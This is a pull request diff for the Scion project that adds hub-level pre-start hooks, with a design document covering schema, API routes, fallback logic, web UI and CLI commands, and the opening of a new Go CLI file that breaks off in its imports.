### PR TITLE
feat(hub): hub-scoped pre-start hooks, web UI, and CLI extension

### DIFF
--- a/.design/project-prestart-hooks-extensions.md
+++ b/.design/project-prestart-hooks-extensions.md
@@ -598,16 +598,11 @@ created after this feature ships.
 
 ## Open Questions
 
-1. **Hub hook list access for non-admins (web UI).** The project settings page
-   needs to show the "Inherited from hub" banner even for project owners who are
-   not hub admins. The proposed GET `/api/v1/pre-start-hooks` call from the page
-   requires deciding whether non-admin users can read the hub hook list (read-only
-   GET). The current design proposes allowing it — hub admins control the hook
-   content (and project owners can already observe that a hook is staged in their
-   agents). If read access is restricted to hub-admin only, the `inheritedHook`
-   banner must be omitted for non-admin project owners, which degrades transparency.
-   **Recommendation:** Allow read (GET list/detail) for any authenticated user;
-   restrict all mutations to hub admin. Mirrors HarnessConfig GET authorization.
+1. ~~**Hub hook list access for non-admins (web UI).**~~ **Resolved (2026-07-27):**
+   Read (GET list/detail) is open to any authenticated user; all mutations
+   (POST/PUT/DELETE/activate) require hub admin. Mirrors HarnessConfig GET
+   authorization. The "Inherited from hub" banner in project settings is therefore
+   always visible to project owners.
 
 2. **CLI: where does `scion hub hook` live in the command tree?** The current design
    places it under `scion hub hook` (subcommand of `hubCmd`). If hub admin commands

--- a/.design/project-prestart-hooks-extensions.md
+++ b/.design/project-prestart-hooks-extensions.md
@@ -1,0 +1,789 @@
+# Pre-Start Hooks: Hub-Level Attachment + Web UI — Design Document
+
+**Status:** Draft  
+**Author:** lifecycle-hooks-arch-2 (Architect Agent)  
+**Date:** 2026-07-27  
+**Extends:** `.design/project-prestart-hooks.md`  
+**Branch:** `scion/lifecycle-hooks-arch-2` (based on `scion/lifecycle-hooks-dev`)  
+**Handoff target:** Engineering Manager (EM) — see [Implementation Phases](#implementation-phases)
+
+---
+
+## Problem & Goals
+
+The v1 pre-start hook feature (shipped on `scion/lifecycle-hooks-dev`, PR #879) is
+project-scoped only. Two gaps remain:
+
+1. **Hub-level attachment.** A hub administrator cannot define a default pre-start
+   hook that applies to all projects without a project-level override. Hub admins
+   need the same resource model that project owners have, scoped to the hub rather
+   than a single project.
+
+2. **No web UI.** The v1 feature is CLI-only. Two UI surfaces are required:
+   - Hub Resources page (`/settings`) — manage hub-scoped hooks (hub admins).
+   - Project Settings → Resources section (`/projects/{id}/settings`) — manage
+     project-scoped hooks and see the inherited hub hook (project owners).
+
+**Success criteria:**
+
+1. A hub admin can create a named hook at hub scope via API, CLI, and web UI.
+2. When an agent is created in a project with no active project hook, the hub hook
+   (if any) is staged at `30-project-custom` as the fallback.
+3. When a project has an active project hook, it overrides the hub hook entirely —
+   the hub hook is not staged. (Execution model: project wins, one slot runs.)
+4. Both UI surfaces follow existing UI conventions (tabs in Hub Resources and
+   Project Settings Resources section); no new navigation patterns are invented.
+5. All v1 project-hook acceptance criteria (from the original design doc) continue
+   to pass.
+
+---
+
+## Non-Goals
+
+- Additive / sequential execution (both hub and project hooks running per agent).
+  User explicitly confirmed Option A (override) over Option B (sequential). This
+  decision is **load-bearing** — if reversed later, the single-slot assumption in
+  the broker must also change.
+- Multiple simultaneously-active hooks at hub scope. One active hub hook at a time,
+  mirroring the one-active-per-project invariant.
+- Hub admin UI beyond the Hub Resources tab. A separate dedicated admin page for
+  lifecycle hooks is not designed here.
+- Post-start, pre-stop, or other hook points. Still deferred (v1 non-goal carries
+  forward).
+
+---
+
+## Proposed Design
+
+### 1. Execution Model (load-bearing)
+
+**Option A — Fallback/Override (confirmed).** One pre-start hook ever runs per
+agent. Resolution order at agent-create time:
+
+```
+1. GetActiveProjectPreStartHook(projectID)
+   → found → stamp into AppliedConfig → done
+2. GetActiveHubPreStartHook()
+   → found → stamp into AppliedConfig → done
+3. Neither found → no script staged
+```
+
+The staged filename is always `30-project-custom`, regardless of hook scope. The
+broker does not need to know whether the script originated from a hub or project
+hook — it only sees `AppliedConfig.ProjectPreStartHookScript`.
+
+`AppliedConfig.ProjectPreStartHookID` continues to hold the hook's UUID for audit.
+No new AppliedConfig field is needed.
+
+**Why this is load-bearing:** The broker stages a single file. If sequential
+execution were added later, a new prefix slot (`25-hub-custom`) would need to be
+introduced, and both `init.go` and the broker would need changes to handle two
+abort-on-failure conditions independently. The sequential change is not
+backward-compatible. This design does not preclude adding it later, but it is
+not a trivial follow-on.
+
+---
+
+### 2. Schema Extension
+
+**Approach: add `scope` to the existing `ProjectPreStartHook` entity.**
+
+This mirrors how `HarnessConfig` handles both global and project-scoped resources
+via `scope` / `scope_id` fields without a separate entity. A separate
+`HubPreStartHook` entity was considered and rejected (see
+[Alternatives Considered](#alternatives-considered)).
+
+**Changes to `pkg/ent/schema/projectprestarthook.go`:**
+
+```go
+// Add to Fields():
+field.Enum("scope").
+    Values("project", "hub").
+    Default("project"),
+
+// Make project_id optional (was NotEmpty — hub-scoped hooks have no project):
+field.String("project_id").
+    Optional(),   // was: NotEmpty()
+```
+
+**Index changes** (in `Indexes()`):
+
+```go
+// Replace: index.Fields("project_id", "slug").Unique()
+// With:    composite including scope so hub hooks (project_id="") don't collide with
+//          project hooks that happen to share a slug.
+index.Fields("scope", "project_id", "slug").Unique(),
+
+// Keep existing:
+index.Fields("project_id", "status"),
+
+// Add: efficient lookup of hub-scoped active hook
+index.Fields("scope", "status"),
+```
+
+**Migration:** `AutoMigrate` adds the `scope` column with default `"project"` on
+hub restart. All existing rows acquire `scope="project"` with no data migration.
+The `project_id` column becomes nullable in the DB schema but existing rows are
+unaffected (they have non-empty values). The Ent `Optional()` annotation permits
+empty strings — no new null handling is needed in Go code.
+
+**Existing indexes on `(project_id, slug)` become `(scope, project_id, slug)`.** The
+old composite index is dropped and replaced. Existing data: project-scoped rows
+still satisfy uniqueness within `(scope="project", project_id=<id>, slug)`.
+
+---
+
+### 3. Store Layer Extension
+
+**`pkg/store/project_pre_start_hook.go` — extend `ProjectPreStartHookStore`:**
+
+```go
+// Add to the store model:
+type ProjectPreStartHook struct {
+    // ... (existing fields) ...
+    Scope     string `json:"scope"`      // "project" | "hub"
+}
+
+// Add to ProjectPreStartHookStore interface:
+
+// GetActiveHubPreStartHook returns the single active hub-scoped hook,
+// or store.ErrNotFound if none exists.
+GetActiveHubPreStartHook(ctx context.Context) (*ProjectPreStartHook, error)
+
+// ListHubPreStartHooks returns all hub-scoped hooks (all statuses),
+// ordered by creation time descending.
+ListHubPreStartHooks(ctx context.Context) ([]*ProjectPreStartHook, error)
+
+// CreateHubPreStartHook creates a new hub-scoped hook and archives any
+// existing active hub hook atomically.
+CreateHubPreStartHook(ctx context.Context, hook *ProjectPreStartHook) (*ProjectPreStartHook, error)
+
+// UpdateHubPreStartHook updates mutable fields of a hub-scoped hook.
+UpdateHubPreStartHook(ctx context.Context, hook *ProjectPreStartHook) (*ProjectPreStartHook, error)
+
+// ActivateHubPreStartHook sets the identified hub-scoped hook to active
+// and archives all other hub-scoped hooks atomically.
+ActivateHubPreStartHook(ctx context.Context, hookID string) (*ProjectPreStartHook, error)
+
+// DeleteHubPreStartHook hard-deletes a hub-scoped hook. Returns
+// store.ErrInvalidInput if the hook is currently active.
+DeleteHubPreStartHook(ctx context.Context, hookID string) error
+
+// GetHubPreStartHook returns a specific hub-scoped hook by ID.
+GetHubPreStartHook(ctx context.Context, hookID string) (*ProjectPreStartHook, error)
+```
+
+**Ent adapter** (`pkg/store/entadapter/project_pre_start_hook_store.go`) adds
+corresponding implementations. Hub-scoped queries filter on `scope = "hub"`;
+project-scoped queries filter on `scope = "project"` (added explicitly, for
+safety, so existing `project_id`-only queries don't accidentally match hub rows).
+
+The `entPSHToStore` conversion function gains a `Scope` field mapping.
+
+---
+
+### 4. Hub-Level API Routes
+
+**New top-level routes** registered in `pkg/hub/server.go`:
+
+```
+GET    /api/v1/pre-start-hooks
+POST   /api/v1/pre-start-hooks
+GET    /api/v1/pre-start-hooks/{hookId}
+PUT    /api/v1/pre-start-hooks/{hookId}
+DELETE /api/v1/pre-start-hooks/{hookId}
+POST   /api/v1/pre-start-hooks/{hookId}/activate
+```
+
+**New file:** `pkg/hub/hub_pre_start_hook_handlers.go`
+
+These mirror `handleProjectPreStartHooks` / `handleProjectPreStartHookByID` but:
+- Call `s.store.GetHubPreStartHook` / `s.store.ListHubPreStartHooks` etc.
+- Use `HubIdentity`-based authorization (hub admin only), not project-owner auth.
+
+**Authorization:** Hub admin role required for all methods (GET and mutating). A
+non-admin user calling these endpoints receives 403. Reasoning: hub hooks affect
+all agents on the hub — they are a hub-admin concern, not a project-owner concern.
+This mirrors the harness-config authorization model at hub/global scope.
+
+**Request/response shapes** are identical to the project-level equivalents.
+`CreateHubPreStartHookRequest`, `UpdateHubPreStartHookRequest`, and
+`ListProjectPreStartHooksResponse` (reused) are sufficient.
+
+**Registration in `pkg/hub/server.go`:**
+
+```go
+s.mux.HandleFunc("/api/v1/pre-start-hooks", s.handleHubPreStartHooks)
+s.mux.HandleFunc("/api/v1/pre-start-hooks/", s.handleHubPreStartHookByID)
+```
+
+---
+
+### 5. Hub-Side Stamping — Fallback Logic
+
+**`pkg/hub/handlers_agent_create_helpers.go`** — the existing stamping block
+becomes a two-step resolution:
+
+```go
+if project != nil && agent.AppliedConfig.ProjectPreStartHookID == "" {
+    // 1. Project-scope hook (takes precedence)
+    hook, err := s.store.GetActiveProjectPreStartHook(ctx, project.ID)
+    if err != nil && !errors.Is(err, store.ErrNotFound) {
+        s.agentLifecycleLog.Warn("failed to resolve project pre-start hook",
+            "project_id", project.ID, "error", err)
+    }
+
+    // 2. Hub-scope fallback (only if no project hook found)
+    if hook == nil {
+        hook, err = s.store.GetActiveHubPreStartHook(ctx)
+        if err != nil && !errors.Is(err, store.ErrNotFound) {
+            s.agentLifecycleLog.Warn("failed to resolve hub pre-start hook", "error", err)
+        }
+    }
+
+    if hook != nil {
+        agent.AppliedConfig.ProjectPreStartHookID = hook.ID
+        agent.AppliedConfig.ProjectPreStartHookScript = hook.Script
+    }
+}
+```
+
+No broker changes are needed. The broker continues to check
+`AppliedConfig.ProjectPreStartHookScript` and stage `30-project-custom` if set.
+
+---
+
+### 6. Hub Client Extension
+
+**`pkg/hubclient/client.go`** — add to the `Client` interface:
+
+```go
+// HubPreStartHooks returns the hub-scoped pre-start hook service.
+HubPreStartHooks() HubPreStartHookService
+```
+
+**New file:** `pkg/hubclient/hub_pre_start_hook.go`
+
+```go
+type HubPreStartHookService interface {
+    List(ctx context.Context) (*ListPreStartHooksResponse, error)
+    Get(ctx context.Context, hookID string) (*store.ProjectPreStartHook, error)
+    Create(ctx context.Context, req *CreateProjectPreStartHookRequest) (*store.ProjectPreStartHook, error)
+    Update(ctx context.Context, hookID string, req *UpdateProjectPreStartHookRequest) (*store.ProjectPreStartHook, error)
+    Activate(ctx context.Context, hookID string) (*store.ProjectPreStartHook, error)
+    Delete(ctx context.Context, hookID string) error
+}
+```
+
+This service calls `/api/v1/pre-start-hooks` (no project ID prefix).
+
+---
+
+### 7. CLI Extension — `scion hub hook`
+
+**New file:** `cmd/hub_pre_start_hook.go`
+
+Subcommand path: `scion hub hook <subcommand>`
+
+```
+scion hub hook list
+    List all hub-scoped pre-start hooks (active + archived).
+    Output: table with ID, slug, status, created date.
+
+scion hub hook create  --name <name> --script <file-or->
+                       [--slug <slug>] [--description <desc>]
+    Create a new hub-scoped hook and activate it.
+    --script accepts a file path or "-" for stdin.
+
+scion hub hook show    <slug-or-id>
+    Print hook details including full script content.
+
+scion hub hook update  <slug-or-id>
+                       [--script <file-or->] [--name <name>] [--description <desc>]
+    Update mutable fields of a hub-scoped hook.
+
+scion hub hook activate <slug-or-id>
+    Set an archived hub hook to active (archives the current active hub hook).
+
+scion hub hook delete  <slug-or-id>
+    Delete an archived hub hook. If the hook is active, --force is required.
+```
+
+Registered in `cmd/hub.go` under `hubCmd`.
+
+**Pattern:** follows `cmd/project_pre_start_hook.go` exactly, replacing
+`c.ProjectPreStartHooks(projectID)` calls with `c.HubPreStartHooks()`.
+
+---
+
+### 8. Web UI — Two New Surfaces
+
+Pre-start hooks are not file-based resources, so `scion-resource-list` does not
+apply. A new **bespoke list+CRUD component** is introduced, following the patterns
+of `scion-env-var-list` and `scion-injected-skills-panel` (self-contained,
+manages its own loading state and inline forms).
+
+#### 8a. New Component: `scion-pre-start-hook-list`
+
+**New file:** `web/src/components/shared/pre-start-hook-list.ts`
+
+```typescript
+@customElement('scion-pre-start-hook-list')
+export class ScionPreStartHookList extends LitElement {
+  /** API base path — '/api/v1/projects/${id}' for project scope,
+   *  '/api/v1' for hub scope. */
+  @property({ type: String }) apiBasePath = '';
+
+  /** When true, no create/edit/delete affordances are shown. */
+  @property({ type: Boolean }) readonly = false;
+
+  /**
+   * Hub-level fallback hook to display as an inherited indicator.
+   * Only relevant when scope is project. When set, a read-only
+   * "Inherited from hub: <name>" banner is shown if no project hook
+   * is active. The banner disappears when a project hook is activated.
+   */
+  @property({ type: Object }) inheritedHook: PreStartHookSummary | null = null;
+}
+```
+
+**Rendered structure (illustrative):**
+
+```
+┌─ Pre-Start Hooks ───────────────────────────────────────────────────┐
+│  ╔════ Inherited from hub: "baseline-setup" ═══╗ (dimmed, read-only) │
+│  ║  This hub-default script will run when no    ║                    │
+│  ║  project hook is active.                     ║                    │
+│  ╚═══════════════════════════════════════════════╝                    │
+│                                                                       │
+│  [+ Create Hook]                                                      │
+│                                                                       │
+│  ┌──────────────────────────────────────────────────────────────┐    │
+│  │ NAME          SLUG          STATUS    CREATED   ACTIONS      │    │
+│  │ Install tools install-tools ● active  Jul 25    [Edit][Arch] │    │
+│  │ Old setup     old-setup     ○ archived Jul 10  [Activate][Del]│    │
+│  └──────────────────────────────────────────────────────────────┘    │
+└───────────────────────────────────────────────────────────────────────┘
+```
+
+**Inline create/edit form** (opens as an inline panel, not a dialog — follows
+`scion-injected-skills-panel` expand pattern):
+
+```
+Name:        [________________]
+Slug:        [________________]  (auto-derived from name)
+Description: [________________]
+Script:      [textarea, monospace, 10 rows, 64 KB max enforced client-side]
+
+[Save]  [Cancel]
+```
+
+**API calls made by the component:**
+- List: `GET {apiBasePath}/pre-start-hooks`
+- Create: `POST {apiBasePath}/pre-start-hooks`
+- Update: `PUT {apiBasePath}/pre-start-hooks/{id}`
+- Activate: `POST {apiBasePath}/pre-start-hooks/{id}/activate`
+- Delete: `DELETE {apiBasePath}/pre-start-hooks/{id}`
+
+The "inherited from hub" banner is purely visual — the component does not fetch the
+hub hook itself; the parent page fetches it and passes it via `inheritedHook`. This
+keeps the hub API call centralized in the page, not duplicated per-component.
+
+---
+
+#### 8b. Hub Resources Page — `web/src/components/pages/settings.ts`
+
+Add a **"Pre-Start Hooks"** tab to the existing `sl-tab-group` in
+`renderResourcesSection()`, after the "Harness Configs" tab:
+
+```typescript
+<sl-tab slot="nav" panel="pre-start-hooks"
+        ?active=${this.activeTab === 'pre-start-hooks'}>
+  Pre-Start Hooks
+</sl-tab>
+
+<sl-tab-panel name="pre-start-hooks">
+  <p class="tab-intro">
+    Hub-wide default pre-start hook. Staged for any agent whose project
+    has no project-level hook active.
+  </p>
+  <scion-pre-start-hook-list
+    apiBasePath="/api/v1"
+    ?readonly=${!this.pageData?.isAdmin}
+  ></scion-pre-start-hook-list>
+</sl-tab-panel>
+```
+
+No `inheritedHook` prop — the hub settings page shows the hub hooks themselves,
+not an upstream fallback.
+
+Deep-link: `/settings?tab=pre-start-hooks` (follows existing tab deep-link pattern).
+
+---
+
+#### 8c. Project Settings Page — `web/src/components/pages/project-settings.ts`
+
+**State addition:**
+
+```typescript
+@state() private hubHook: PreStartHookSummary | null = null;
+```
+
+**Load the hub fallback hook** alongside other project data. Add to
+`loadProject()` (or a parallel call in `connectedCallback`):
+
+```typescript
+// Fetch the active hub hook (if any) for the inherited indicator.
+// Non-admin users may call this endpoint (read-only GET). If 403, treat as null.
+const hubResp = await apiFetch('/api/v1/pre-start-hooks?status=active&limit=1');
+if (hubResp.ok) {
+  const data = await hubResp.json();
+  this.hubHook = data.hooks?.[0] ?? null;
+}
+```
+
+**Add "Pre-Start Hooks" tab** to `renderResourcesSection()`, after "Harness Configs":
+
+```typescript
+<sl-tab slot="nav" panel="pre-start-hooks"
+        ?active=${this.activeResourcesTab === 'pre-start-hooks'}>
+  Pre-Start Hooks
+</sl-tab>
+
+<sl-tab-panel name="pre-start-hooks">
+  ${this.renderPreStartHooksContent()}
+</sl-tab-panel>
+```
+
+**New render method:**
+
+```typescript
+private renderPreStartHooksContent() {
+  const canEdit = canAny(this.project!._capabilities, 'update', 'manage');
+  return html`
+    <div class="section-header" style="margin-bottom: 1rem;">
+      <div class="section-header-text">
+        <p style="margin: 0;">
+          Project-scoped pre-start scripts staged before each agent container starts.
+          A project hook overrides the hub-wide default.
+        </p>
+      </div>
+    </div>
+    <scion-pre-start-hook-list
+      apiBasePath="/api/v1/projects/${this.projectId}"
+      ?readonly=${!canEdit}
+      .inheritedHook=${this.hubHook}
+    ></scion-pre-start-hook-list>
+  `;
+}
+```
+
+Deep-link: `/projects/{id}/settings?tab=pre-start-hooks`.
+
+---
+
+### 9. Types (`web/src/shared/types.ts`)
+
+Add the `PreStartHookSummary` type (used by `inheritedHook` prop):
+
+```typescript
+export interface PreStartHookSummary {
+  id: string;
+  name: string;
+  slug: string;
+  scope: 'project' | 'hub';
+  status: string;
+}
+```
+
+The full `ProjectPreStartHook` type (for list responses) is a superset of this.
+
+---
+
+## Alternatives Considered
+
+### 1. Separate `HubPreStartHook` entity
+
+A distinct `pkg/ent/schema/hubprestarthook.go` entity with its own table, store
+interface, and API handlers — no `scope` field on `ProjectPreStartHook`.
+
+**Rejected because:**
+- Duplicates the entire schema, store, and API surface without meaningful
+  structural difference. The only difference is `project_id` is absent.
+- `HarnessConfig` already established the `scope`+`scope_id` pattern for
+  exactly this case. Diverging creates maintenance inconsistency.
+- Two entities mean two migration steps and two test suites for the same logical
+  feature. The added isolation is not worth the cost.
+
+### 2. Sequential execution (Option B — both hub and project hooks run)
+
+Hub hook stages at `25-hub-custom`, project hook at `30-project-custom`. Both
+run during `EventPreStart`. If either exits non-zero, agent aborts.
+
+**Rejected (user confirmed Option A explicitly)** and structurally complex:
+- `init.go` abort logic currently checks a single "project hook staged" boolean.
+  Two-hook support requires independent abort decisions per slot.
+- Failure attribution: if the hub hook fails, should the project owner see the
+  error? They didn't write it. Error UX is murkier.
+- Broker staging needs two `WriteFile` calls and two AppliedConfig fields.
+- Not reversible without also clearing `25-hub-custom` slots from agent homes
+  on rollback.
+- The use case (hub admin mandating a hook that always runs) is not an explicit
+  current requirement.
+
+### 3. Hub hook attached via project-level settings (default annotation)
+
+Store the hub hook reference as a hub-level annotation or setting, resolved
+client-side (in CLI or hub stamping) by lookup. No new resource entity.
+
+**Rejected because:**
+- No versioning or naming — same problem as the annotation approach rejected in
+  the v1 design.
+- "Default hook" is itself a resource worth managing with history, activation,
+  and slug identity. Annotations don't support any of that.
+
+### 4. Hub hook as a special `project_id = "__hub__"` sentinel
+
+Use a reserved sentinel project ID (e.g., `"__hub__"`) to mark hub-scoped
+hooks in the existing `project_pre_start_hooks` table, without adding a `scope`
+column.
+
+**Rejected because:**
+- The sentinel would be a magic string, not a typed enum. Any code that iterates
+  `project_id`-filtered queries would need a "not sentinel" guard to avoid
+  surfacing hub hooks as if they were project hooks.
+- The index `(project_id, slug)` would require an additional exception for the
+  sentinel scope. A typed `scope` column is cleaner and self-documenting.
+- HarnessConfig precedent uses `scope`; consistency wins.
+
+### 5. No bespoke component — extend `scion-resource-list` with a new `kind`
+
+Add `kind = 'pre-start-hook'` to the existing `ResourceKind` union in
+`resource-list.ts` and extend the component to handle inline scripts.
+
+**Rejected because:**
+- `scion-resource-list` is designed for **file-based** resources (templates,
+  harness-configs). Its model (`ResourceItem`, clone/delete/file-browse actions)
+  does not map to pre-start hooks, which have status transitions (activate/archive)
+  and an inline script field — not a file tree.
+- Adding a third divergent `kind` would bloat `resource-list.ts` with
+  special-cased branches. The `scion-env-var-list` / `scion-injected-skills-panel`
+  precedent shows that resource-specific components are the right call here.
+
+---
+
+## Migration / Rollout
+
+| Step | Risk | Rollback |
+|---|---|---|
+| Ent schema: add `scope`, make `project_id` optional | None — new column with default; no existing data affected | Drop `scope` column, revert `project_id` to `NotEmpty` |
+| Index change: `(project_id, slug)` → `(scope, project_id, slug)` | None — existing rows satisfy the new index | Revert index definition |
+| New store methods (`GetActiveHubPreStartHook`, etc.) | None — additive interface extension | Remove methods |
+| New `/api/v1/pre-start-hooks` routes | None — new routes, no existing handlers affected | Remove route registrations |
+| Stamping change (two-step resolution) | **Low** — only activates when a hub hook exists; existing projects with no hub hook are unchanged | Revert to single `GetActiveProjectPreStartHook` call |
+| Web UI tabs | None — new tabs behind existing auth gates | Remove tab entries |
+| CLI `scion hub hook` | None — new subcommand | Remove subcommand registration |
+
+**Deployment order:** All backend changes ship in one release. Schema migration
+runs on hub restart. No data migration scripts required. The web UI and CLI
+changes are independently deployable once the API surface is available (they
+degrade gracefully if the endpoint is absent).
+
+**Backward compatibility:** Agents created before this change have
+`AppliedConfig.ProjectPreStartHookScript` set from the project hook at creation
+time. This field is unaffected. The hub hook fallback only applies to agents
+created after this feature ships.
+
+---
+
+## Open Questions
+
+1. **Hub hook list access for non-admins (web UI).** The project settings page
+   needs to show the "Inherited from hub" banner even for project owners who are
+   not hub admins. The proposed GET `/api/v1/pre-start-hooks` call from the page
+   requires deciding whether non-admin users can read the hub hook list (read-only
+   GET). The current design proposes allowing it — hub admins control the hook
+   content (and project owners can already observe that a hook is staged in their
+   agents). If read access is restricted to hub-admin only, the `inheritedHook`
+   banner must be omitted for non-admin project owners, which degrades transparency.
+   **Recommendation:** Allow read (GET list/detail) for any authenticated user;
+   restrict all mutations to hub admin. Mirrors HarnessConfig GET authorization.
+
+2. **CLI: where does `scion hub hook` live in the command tree?** The current design
+   places it under `scion hub hook` (subcommand of `hubCmd`). If hub admin commands
+   are expected to live under a different namespace (e.g., `scion admin hook`), the
+   CLI placement should change. This is easily reversible.
+
+3. **Script viewer in project settings UI.** Should clicking a project-scope hook
+   in the list open the script inline (textarea in place) or navigate to a detail
+   page (`/projects/{id}/pre-start-hooks/{id}`)? The current design uses inline
+   expansion (consistent with env-var-list patterns). If a dedicated detail page is
+   preferred (consistent with harness-config-detail page), a new page component and
+   routing entry are required. Inline is simpler and sufficient for scripts up to
+   64 KB.
+
+---
+
+## Implementation Phases
+
+Three parallel workstreams after the schema/store phase (A1 must complete first).
+Suggested EM breakdown:
+
+### Workstream A — Backend (1 developer)
+
+**A1 — Schema + Store** _(unblocks everything else)_
+
+Files touched:
+- `pkg/ent/schema/projectprestarthook.go` (add `scope`, make `project_id` optional, update indexes)
+- `pkg/store/project_pre_start_hook.go` (add hub-scoped methods to interface, extend store model with `Scope`)
+- `pkg/store/entadapter/project_pre_start_hook_store.go` (hub-scoped query implementations; update `entPSHToStore`)
+- Run `go generate ./pkg/ent/`
+
+Tests: `pkg/store/entadapter/project_pre_start_hook_store_test.go` — add hub-scope CRUD, activate-archives-previous (hub scope), verify project-scope and hub-scope rows do not interfere.
+
+**A2 — Hub API + Agent Stamping** _(depends on A1)_
+
+Files touched:
+- `pkg/hub/hub_pre_start_hook_handlers.go` (new — GET list/detail, POST create, PUT update, DELETE, POST activate; hub-admin auth)
+- `pkg/hub/server.go` (register `/api/v1/pre-start-hooks` and `/api/v1/pre-start-hooks/` routes)
+- `pkg/hub/handlers_agent_create_helpers.go` (extend stamping to two-step project→hub fallback)
+- `pkg/hubclient/hub_pre_start_hook.go` (new — `HubPreStartHookService`)
+- `pkg/hubclient/client.go` (add `HubPreStartHooks()` to interface and concrete client)
+
+Tests:
+- `pkg/hub/hub_pre_start_hook_handlers_test.go` (new) — CRUD endpoints, hub-admin-only auth (non-admin gets 403), script-too-large gets 400.
+- `pkg/hub/handlers_agent_create_helpers_test.go` — extend to verify: (a) hub hook stages when no project hook exists; (b) project hook stages (not hub hook) when both are active.
+
+---
+
+### Workstream B — Frontend Web UI (1 developer, can start after A1)
+
+Workstream B can be developed in parallel with A2, using the project-level hooks
+API (already shipped) for component development. Full integration tests require
+A2.
+
+**B1 — Shared Component**
+
+Files touched:
+- `web/src/shared/types.ts` (add `PreStartHookSummary` interface)
+- `web/src/components/shared/pre-start-hook-list.ts` (new — `scion-pre-start-hook-list` component)
+- `web/src/components/index.ts` (register new component)
+
+Behavior:
+- List hooks from `GET {apiBasePath}/pre-start-hooks`
+- Inline create/edit form with name, slug, description, script textarea
+- 64 KB client-side script size check before POST/PUT
+- Status badges (active = filled circle, archived = empty circle)
+- Per-row activate and delete actions; edit opens inline form
+- "Inherited from hub" banner when `inheritedHook` prop is set and no active project hook exists
+
+**B2 — Hub Resources Page**
+
+Files touched:
+- `web/src/components/pages/settings.ts` (add "Pre-Start Hooks" tab + `scion-pre-start-hook-list`)
+
+**B3 — Project Settings Page**
+
+Files touched:
+- `web/src/components/pages/project-settings.ts` (add `hubHook` state, fetch active hub hook in `loadProject()`, add "Pre-Start Hooks" tab + `renderPreStartHooksContent()`)
+
+B3 depends on B1. B2 and B3 can be done in the same PR or split.
+
+---
+
+### Workstream C — CLI (1 developer, can start after A1)
+
+**C1 — Hub Hook CLI Commands**
+
+Files touched:
+- `cmd/hub_pre_start_hook.go` (new — `hubHookCmd` + `list`, `create`, `show`, `update`, `activate`, `delete` subcommands)
+- `cmd/hub.go` (register `hubHookCmd` as subcommand of `hubCmd`)
+
+Pattern: mirrors `cmd/project_pre_start_hook.go` exactly, using
+`c.HubPreStartHooks()` instead of `c.ProjectPreStartHooks(projectID)`.
+
+---
+
+### Workstream D — Integration Tests (after A2 + B3 + C1)
+
+**D1 — End-to-End Scenarios**
+
+1. Hub hook only → agent created → `30-project-custom` staged with hub script.
+2. Project hook only → agent created → `30-project-custom` staged with project script.
+3. Both hub and project hooks active → agent created → `30-project-custom` contains
+   project script (not hub script).
+4. Hub hook active, project hook archived → agent created → hub script stages.
+5. No hooks → agent created → `30-project-custom` absent.
+6. Update hub hook after agents exist → existing agents unchanged (script baked into
+   `AppliedConfig`); new agent picks up updated hub hook.
+
+---
+
+## Acceptance Criteria
+
+QA should verify all of the following before signing off on the extension:
+
+### Hub-level CRUD
+
+1. **Create hub hook via API:** `POST /api/v1/pre-start-hooks` with valid JSON
+   creates a hook with `scope: "hub"`, `status: "active"`. Non-admin user
+   receives 403.
+
+2. **One active hub hook at a time:** Creating a second hub hook archives the first.
+
+3. **Script size limit:** `POST` with `script` exceeding 64 KB returns 400.
+
+4. **CLI create:** `scion hub hook create --name "baseline" --script setup.sh`
+   creates an active hub hook visible in `scion hub hook list`.
+
+5. **CLI from stdin:** `cat setup.sh | scion hub hook create --name "baseline" --script -`
+   works.
+
+### Project overrides hub
+
+6. **Hub hook fallback:** Agent created in project with no active project hook
+   has `30-project-custom` staged from the hub hook script.
+
+7. **Project hook overrides:** Agent created in project with active project hook
+   (and active hub hook) has `30-project-custom` staged from the project hook
+   script. Hub hook content does not appear.
+
+8. **Archive project hook → hub fallback resumes:** After archiving a project
+   hook, the next agent created in that project stages the hub hook (not the
+   archived project hook).
+
+### Web UI — Hub Resources page
+
+9. **Pre-Start Hooks tab visible** at `/settings?tab=pre-start-hooks` for hub
+   admins. Non-admin authenticated users can view the list (read-only).
+
+10. **Create from UI:** Hub admin can create, activate, and delete hub hooks via
+    the web UI. A non-admin sees the list but has no create/edit/delete affordances.
+
+11. **Deep-link:** Navigating directly to `/settings?tab=pre-start-hooks` opens
+    the Pre-Start Hooks tab without requiring other tabs to load first.
+
+### Web UI — Project Settings page
+
+12. **Pre-Start Hooks tab visible** at `/projects/{id}/settings?tab=pre-start-hooks`
+    for project owners. Non-owner members cannot access project settings (existing
+    gate, unchanged).
+
+13. **Inherited hub banner:** When no project hook is active, the inherited hub
+    hook (if any) is shown in a read-only "Inherited from hub" indicator. When a
+    project hook is activated, the banner disappears.
+
+14. **Project-scope CRUD from UI:** Project owner can create, activate, and delete
+    project-scoped hooks. Each action refreshes the list.
+
+### Regression — v1 scenarios
+
+15. All 15 acceptance criteria from `.design/project-prestart-hooks.md` continue
+    to pass unchanged.
+
+16. **No regression for agents without hooks:** Projects with no hub or project
+    hook behave identically to pre-feature behavior. `30-project-custom` is absent.
+
+17. **Existing agents unaffected by hub hook creation:** Agents created before a
+    hub hook is defined do not retroactively acquire the hook script. The script is
+    baked into `AppliedConfig` at creation time.

--- a/cmd/hub.go
+++ b/cmd/hub.go
@@ -300,6 +300,7 @@ func init() {
 	hubCmd.AddCommand(hubDisableCmd)
 	hubCmd.AddCommand(hubLinkCmd)
 	hubCmd.AddCommand(hubUnlinkCmd)
+	hubCmd.AddCommand(hubHookCmd)
 
 	// Project subcommands
 	hubProjectsCmd.AddCommand(hubProjectsInfoCmd)

--- a/cmd/hub_pre_start_hook.go
+++ b/cmd/hub_pre_start_hook.go
@@ -1,0 +1,432 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package cmd
+
+import (
+	"context"
+	"fmt"
+	"os"
+	"strings"
+	"text/tabwriter"
+	"time"
+
+	"github.com/GoogleCloudPlatform/scion/pkg/apiclient"
+	"github.com/GoogleCloudPlatform/scion/pkg/config"
+	"github.com/GoogleCloudPlatform/scion/pkg/hubclient"
+	"github.com/GoogleCloudPlatform/scion/pkg/store"
+	"github.com/spf13/cobra"
